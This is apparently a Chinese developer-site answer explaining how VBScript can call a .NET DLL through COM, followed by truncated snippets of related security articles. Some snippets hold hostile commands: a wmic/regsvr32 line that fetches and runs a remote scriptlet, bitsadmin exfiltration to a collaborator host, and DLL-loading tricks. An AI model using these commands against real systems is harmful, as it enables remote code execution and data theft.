是否可以从vbscript执行.NET程序集(DLL)？

是的，可以从VBScript执行.NET程序集（DLL）。

在VBScript中，可以使用ActiveX对象来调用.NET程序集中的方法。具体步骤如下：

创建一个COM可调用的.NET程序集。

首先，需要创建一个COM可调用的.NET程序集。在.NET项目中，将生成的DLL文件注册为COM组件，然后在VBScript中使用CreateObject方法创建该组件的实例。

在VBScript中调用.NET程序集。

在VBScript中，可以使用CreateObject方法创建.NET程序集的实例，然后调用该实例的方法。例如：

Set obj = CreateObject("YourAssemblyName.YourClassName")
obj.YourMethodName

其中，YourAssemblyName是.NET程序集的名称，YourClassName是.NET程序集中的类名，YourMethodName是该类中的方法名。

需要注意的是，在使用VBScript调用.NET程序集时，需要确保.NET程序集已经在目标计算机上注册。

总之，虽然VBScript是一种较早期的脚本语言，但它仍然可以通过ActiveX对象与.NET程序集进行交互。

相关·内容

判断DLL文件是CC++动态链接库还是.NET程序集及查看DLL依赖

前言如果是程序方面的识别，一般我们如果直接在C++中引用.NET DLL程序会报错的，一般需要我们将.NET DLL生成组件dll 然后再在C++中用，而且需要做些相应的配置。...同样在.NET程序中直接使用C++ DLL也是会有问题的，一般要我们通过interop技术比如Pinvoke之类的来做的。...判断DLL类型如果可以使用工具，你可以用CorFlags.exe (CorFlags Conversion Tool).aspx) 工具来识别。...\RobotUsbWrapper.dll .NET DLL CorFlags.exe ....--assembly 星火微课.exe --include *.dll --move 编译通过后就可以了。

3.6K1 0

APT分析报告：04.Kraken新型无文件APT攻击利用Windows错误报告服务逃避检测

该文档包含一个恶意宏，该宏使用CactusTorch VBA模块的修改版，通过使用VBScript将.Net编译的二进制文件加载到内存中来执行，以进行无文件攻击。...CactusTorch正在利用DotNetToJscript技术将.Net编译的二进制文件加载到内存中，并从vbscript中执行。下图显示了该威胁攻击者所使用的宏内容。它具有自动打开和自动关闭功能。...最后，通过调用DynamicInvoke函数，从内存中加载并执行.Net有效负载（Payload）。...(2) VM检测在此函数中，它将通过提取显示驱动程序注册表项的提供程序名称来检查其是否在VMWare或VirtualBox中运行。...下面是导入表，我们可以预期它将执行一些进程注入。

1K3 0

Active APT

值得注意的是，有两个文本文件，一个用于 Word，一个用于 Excel，包含要插入目标文档的恶意宏的 VBA 源代码，以及负责查找和破坏现有文档的 .NET 程序集。...如图 4 所示，程序集名称为 CodeBuilder。 image.png 图 4....在受感染机器上下载和安装的最流行的工具可以大致分为两类：下载程序和后门程序。下载者他们的下载器有很多变体，其中大多数是用 C# 或 VBScript 编写的。...image.png 编译器模块中包含的部分 C# 下载器源代码 GitHub项目模块如图 7 所示，此 .NET 可执行文件使用 GitHub 存储库来获取和执行下载程序。...这些文件窃取程序还可以从 C&C 服务器下载和执行任意代码。与 Gamaredon 小组使用的许多其他工具一样，它们有四种不同的编码语言：C/C++、C#、批处理文件和 VBScript。

8K0 0

最好的.NET开源免费ZIP库DotNetZip（.NET组件介绍之三）

7.PowerShell或VBScript中的一个管理脚本，用于执行备份和归档。　　8.WCF服务，接收作为附件的zip文件，并动态地将zip解压缩到流以进行分析。　　...9.一个老式的ASP（VBScript）应用程序，通过COM接口为DotNetZIp生成一个ZIP文件。　　10.读取或更新ODS文件的Windows Forms应用程序。　　...它还可以从脚本环境或具有COM功能的环境（如Powershell脚本，VBScript，VBA，VB6，PHP，Perl，Javascript等）中使用。...DotNetZip打包为一个单一的DLL，大小约400k。它没有第三方依赖。它是中等信任，因此可以在大多数托管商使用。通过引用DLL来获取压缩。...DLL文件后，可以直接查看相应的方法和属性，在这里就不做详细的介绍。

3.2K7 0

HtmlDocument.InvokeScript 方法 (String, Object[])「建议收藏」

注意：此方法在 .NET Framework 2.0 版中是新增的。执行在 HTML 页面中定义的动态脚本函数。...命名空间:System.Windows.Forms 程序集:System.Windows.Forms（在 system.windows.forms.dll 中） <script type=”...（可以通过调用 GetType 并使用 InvokeMember 来调用此类对象。）...您可以调用使用用户计算机上安装的任何活动脚本语言（包括 JScript 和 VBScript）编写的任何函数。...如果用户在 Internet Explorer 中显式禁用了脚本执行，或者网页的当前安全配置禁止脚本执行，则此方法将不会执行任何操作。

6742 0

Red Team 工具集之攻击武器库

库漏洞，在 Office 文档中加载执行远程的恶意 .NET 代码，而整个漏洞的罪魁祸首竞是 .NET Framework 一个换行符处理失误。...应用程序可以使用DDE 协议实现一次性数据传输以及持续的数据交换（当新数据可用时，应用程序发送更新通知给另一个应用程序）。在 MSWord 和 MSExcel 里，可以使用 DDE 来执行命令。...Exchange 服务器进行交互，主要功能有：枚举有效用户、创建新的恶意邮件规则、保存全局邮件地址列表（GAL）、通过表单执行 VBScript、通过 Outlook 主页执行 VBScript。...https://github.com/mwrlabs/wePWNise DotNetToJScript 这个工具可以将 .net 2.0 的应用程序转为 JScript 脚本，满足一些特殊的环境。...https://github.com/cobbr/PSAmsi Reflective DLL injection 这个反射 DLL 注入是采用反射编程的思想将 DLL 注入到指定的进程中，我们可以将 payload

2.7K0 0

红队搬运工-github有趣的免杀项目分享

AV_Evasion_Tool 介绍：红队免杀工具开发语言：C#，go 推荐理由：操作方便，项目一直在更新如果使用工具的全部功能，请确保满足以下全部条件： 64位 Windows 7 或以上操作系统 .net...tdm-gcc 安装 64位 Go 语言环境，并添加到系统环境变量 4.Donut github链接：https://github.com/TheWover/donut 介绍：Donut是一种与位置无关的代码，可以在内存中执行...VBScript、JScript、EXE、DLL 文件和 dotNET 程序集。...Donut 创建的模块可以从 HTTP 服务器暂存，也可以直接嵌入到加载程序本身中开发语言：C 推荐理由：内存执行，过静态很好用，内存加密，过内存扫描。...7.Phantom DLL hollowing github链接：https://github.com/forrest-orr/phantom-dll-hollower-poc/ 介绍：DLL 空心化是一种技术

2.1K1 0

在Windows中劫持DLL

文章前言 DLL劫持是一种用于执行恶意有效负载的流行技术，这篇文章列出了将近300个可执行文件，它们容易受到Windows 10(1909)上相对路径DLL劫持的攻击，并展示了如何使用几行VBScript...，你可以像最初的研究人员那样编译一些C代码行来完成这项工作，但事实证明VBScript实际上也可以为我们完成这项工作，下面的POC表明，只需几行代码，就可以实现这一点： Set oFSO = CreateObject...因此，让我们把重点放在检测上，您可以从意外路径中搜寻前面提到的任何DLL的创建或加载，特别是在临时位置(如:%appdata%)中，毕竟加载DLL的(合法)应用程序的名称可以更改，但DLL的文件名始终是固定的...，这里可以找到一个示例Sigma规则——它成功地检测到我们的DLL劫持，尽管正如您所看到的，它的伸缩性不是很好，很可能会出现误报，您可以采用一种更通用的方法，通过查找在意外位置是否存在Microsoft...签名的二进制文件，以及此类Microsoft签名的二进制文件是否从意外位置加载DLL(无论位置如何) 最后，通过查找/windows/文件夹中或该空格中结尾的任何文件夹中的任何活动，可以轻松可靠地检测到已证明的

2.1K1 0

MSSQL 备忘录

在 SQL 服务器之间的数据库链接的情况下，即链接的 SQL 服务器，可以执行存储过程。数据库链接甚至可以跨林信任工作。...DLL 可以具有任何文件扩展名，也可以从 UNC 路径或 Webdav 加载。...instance> -Query "EXEC xp_calc" 列出现有的扩展过程 Get-SQLStoredProcedureXP -Instance -Verbose CLR 程序集...创建程序集、更改程序集或DDL_Admin角色也可以使用它。执行以服务帐户的权限进行。...这允许编写可以执行使用服务器级别权限的代码的程序。

2.2K2 0

Nebula漏洞利用包CVE-2016-0189漏洞利用分析

当执行 o = aw.Cod(arg1,2)时， VBScript引擎将会把地址0x2f72878作为一个vbString对象来处理。...一个有趣的DLL劫持技巧分析本来到这里可以结束了，然而我们在Nebula的漏洞利用包里发现了一个有趣的DLL劫持技巧。...尽管在前面，上帝模式已经成功开启了，当IE的保护模式开启时（默认是开启的），Vista以后的版本在执行Shell.Applicaion对象的ShellExecute 函数时，会弹出一个如下的对话框(除非被加载的程序在...然而，攻击者可以通过如下方式进行DLL劫持攻击。 1）在%temp%\ 目录下创建system32目录 2）在上面创建的目录下生成一个假的shell32.dll文件，用来加载需要加载的程序。...并且配合一个DLL劫持技巧，达到了绕过IE保护模式，静默执行任何文件的目的。

1.5K6 0

红队技巧-常规横向手法

3.客户端连接执行命令，服务端启动相应的程序并执行回显数据。 4.运行完后删除服务。...AppID -该应用程序标识符用于指定一个的配置或多个COM对象与同一可执行相关联。...在powershell中我们可以使用 get-CimInstance来列出本地COM程序列表远程DCOM对象的实例表现如下：客户端计算机从远程计算机请求实例化由CLSID表示的对象。...库可以扩展Excel，XLL库只是导出特定功能的DLL。...此外，我们可以将加载jscript.dll或vbscript.dll来运行脚本本身。限制： ScriptControl对象仅在32位版本中可用。

2.1K2 0

微软计划于2024年下半年逐步弃用VBScript

按需功能（FOD）是可选的 Windows 功能，如 .NET Framework (.NetFx3) 、Hyper-V、Windows Subsystem for Linux，默认情况下不安装，但可根据自身需要添加...微软的停用计划包括三个阶段：第一阶段将从 2024 年下半年开始，在 Windows 11 24H2 中默认启用 VBScript 作为可选功能；第二阶段将于 2027 年左右开始，VBScript...因此，所有 VBScript 动态链接库（.dll 文件）都将被删除，使用 VBScript 的项目也将停止运行。...这种编程语言通常捆绑在 Internet Explorer 中（部分 Windows 10 版本将于 2023 年 2 月禁用），同时有助于使用 Windows Script 自动执行任务和控制应用程序...微软的这个战略最早可以追溯到 2018 年，当时雷德蒙德将对其反恶意软件扫描接口（AMSI）的支持扩展到了 Office 365 客户端应用程序，从而遏制了利用 Office VBA 宏的攻击。

1911 0

技术分享|amsi绕过总结

AMSI 为您的最终用户及其数据、应用程序和工作负载提供增强的恶意软件保护。AMSI 与反恶意软件供应商无关；它旨在支持当今可以集成到应用程序中的反恶意软件产品提供的最常见的恶意软件扫描和保护技术。...amsi只是一个通道，真正检测出是否是恶意脚本的是杀软，比如defender，amsi和杀软的区别在于无论我们的恶意脚本是经过多次模糊处理还是远程执行，amsi都可以在脚本注入内存前检测到。...%windir%/System32/vbscript.dll 5.Office VBA macros(宏) VBE7.dll 6 .NET Assembly clr.dll 7.WMI %windir...当然并不是所有脚本都可以在低版本的powershell执行。...还有一点，用powershell3 /4/5都还是默认以当前版本的powershell来执行另外vbscript/jscript不存在所谓降级攻击，因为在10/16/19并不存在像powershell

1.8K2 1

C# 解析js方法，并调用js方法

首先要解析Js方法，可以用微软的msscript.ocx控件（Interop.MSScriptControl.dll）来解析js方法. 1.msscript.ocx下载的地址 http://www.microsoft.com...2.项目中引用 msscript.ocx 或者 Interop.MSScriptControl.dll 现在通过控件的一些方法可以解析js方法，并调用js方法返回值。...不过这儿可以将控件类的一些属性和方法封装成单独的类，方便自己调用。封装成ScriptEngine类。...通过msscript.ocx控件执行JS脚本 ,先引用 Interop.MSScriptControl.dll //官网下载：然后引用 xxx.ocx就行了 http://www.microsoft.com...set { this.msc.AllowUI = value; } } /// /// 宿主应用程序是否有保密性要求

4.9K4 1

渗透技巧 | Windows上传并执行恶意代码的N种姿势

执行则具体可以分为有文件类和无文件类，具体分的话就是内存执行、本地缓存、磁盘文件下面我们会总结一些下载和执行的方法，其中也大量包含一些AppLocker ByPass技术和dll注入技术，部分也可以用于后门创建...文件 winword.exe /l dllfile.dll Cmstp 通过安装一个V**配置从Webdav加载DLL，可以参考以下链接 cmstp.exe /ni /s c:\cmstp...它可以执行一个显示特定函数的DLL。需要注意的是他不一定需要.dll的后缀名文件。...Framework中System.Reflection namespace中的一种方法，该方法会有多个重载版本，其中一个就是提供程序集的详细信息，即程序集的标识，包括程序集的名称，版本，区域信息，公有密钥标记...它可以从内存、本地磁盘或者URL当中调用文件。.NET程序集最初只是读取权限，为了枚举与二进制文件相关联的方法和属性，又将权限更改为执行。所以这种方法只能执行C#编译的程序。

3.8K5 1

ASP.NET特写

.NET应用能够流畅地同时运行.asp和.aspx页面。旧式的ASP页面将由asp.dll直接运行，但它不能利用CLR的功能。...这些改动分属三个层次： API中的改动页面结构的改动 VBScript和VB.NET之间的改动 ASP.NET只允许每个页面使用一种语言。...在DNA中，ASP页面可以同时使用JScript和VBScript；但ASP.NET不再允许这种用法。...另外，有的兼容性问题可能源于所有ASP.NET的数组下标都从0开始，而在ASP 3中有的从0开始，有的从1开始。...所有这些控件都会分析调用它们的客户程序类型，然后生成合适的表现代码。

1.9K2 0

Windows上传并执行恶意代码的N种姿势

文件 winword.exe /l dllfile.dll Cmstp 通过安装一个V**配置从Webdav加载DLL，可以参考以下链接 cmstp.exe /ni /s c:\cmstp...它可以执行一个显示特定函数的DLL。需要注意的是他不一定需要.dll的后缀名文件。...但是，这个二进制文件可以用来执行恶意的JavaScript代码并绕过应用程序白名单保护。...Framework中System.Reflection namespace中的一种方法，该方法会有多个重载版本，其中一个就是提供程序集的详细信息，即程序集的标识，包括程序集的名称，版本，区域信息，公有密钥标记...它可以从内存、本地磁盘或者URL当中调用文件。.NET程序集最初只是读取权限，为了枚举与二进制文件相关联的方法和属性，又将权限更改为执行。所以这种方法只能执行C#编译的程序。

5.3K3 1

命令执行SQL盲注无回显外带方式

这篇文章我们主要以命令执行漏洞为例来介绍几个常用的数据外带平台和方式，不会再去细讲每个漏洞的外带利用方式，因为写的师傅太多了，想了解的可以自己去百度搜索相关资料学习下吧。...://***.burpcollaborator.net") bitsadmin /rawreturn /transfer n "http://***.burpcollaborator.net" "D\1....txt" 如果想把命令执行结果通过httplog外带出来，我们可以直接执行以下Python命令开启一个临时Web服务。...wmic process call create "regsvr32 /s /n /u /i:http://192.168.1.120:8888/whoami.txt scrobj.dll" 执行命令脚本...SQL盲注漏洞，我们可以先去看一下目标主机是否能够出网，如果不能咋们就用dnslog外带，如果可以则建议还是用httplog外带，因为httplog要比dnslog能带出的信息更多，如：查看指定文件绝对路径

2.2K1 0

dotnet 使用 Refasmer 从现有的 DLL 里面导出公开的成员组装出新的仅作为引用用途的程序集

本文告诉大家 Resharper 家（JetBrains）开源的 Refasmer 工具，这个工具的功能就是从现有的 DLL 或 EXE 程序集里面，将所有的公开成员导出，重新打出新的 DLL 或 EXE...或者用在某些超大项目上，用于支持超大解决方案里面单个项目的独立构建和 dotnet 自带的 ProduceOnlyReferenceAssembly 不同之处在于 Refasmer 可以从 DLL 里面导出仅作为引用用途的程序集...，如下面命令 refasmer Lindexi.dll -o LindexiDoubi.dll 执行以上代码，将会输出 LindexiDoubi.dll 程序集安静运行默认的 refasmer 也没啥输出...程序集和期望输出的文件路径，然后将会执行 Refasmer 库提供的方法，从 file 里面读取公开成员，写入到 output 文件以上代码加上了 metaReader.IsAssembly 用于判断当前的...DLL 是否 dotnet 程序集以上代码的 PEReader 是 dotnet 默认提供的机制，在 Refasmer 库里面核心用是这个进行读取程序集内容调用 MetadataImporter.MakeRefasm

5972 0

利用 RDPWRAP 做 RDP 劫持的威胁检测

使用 SYSMON 检测 CACTUSTORCH CACTUSTORCH 是一种 JavaScript 和 VBScript 的 shellcode 生成器。...它的核心功能是利用 JavaScript 调用对象还原序列化（还原到内存）和从内存载入一个任意的 .NET v2/3.5 程序（脚本用 base64 编码）然后创建远程线程去执行。...它仅支持注入 32 位的可执行文件。...当执行时，我们能从 sysmon envt8 “CreateRemoteThread”发现： 1、在一个 32 位程序里创建 64 位的远程线程 2、StartModule/StartFunction...在 macro 执行过程中，winword.exe 会载入 4 个 WMI 相关模块，这些模块并不常用，所以可以用来检测这种技术。

3.3K1 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云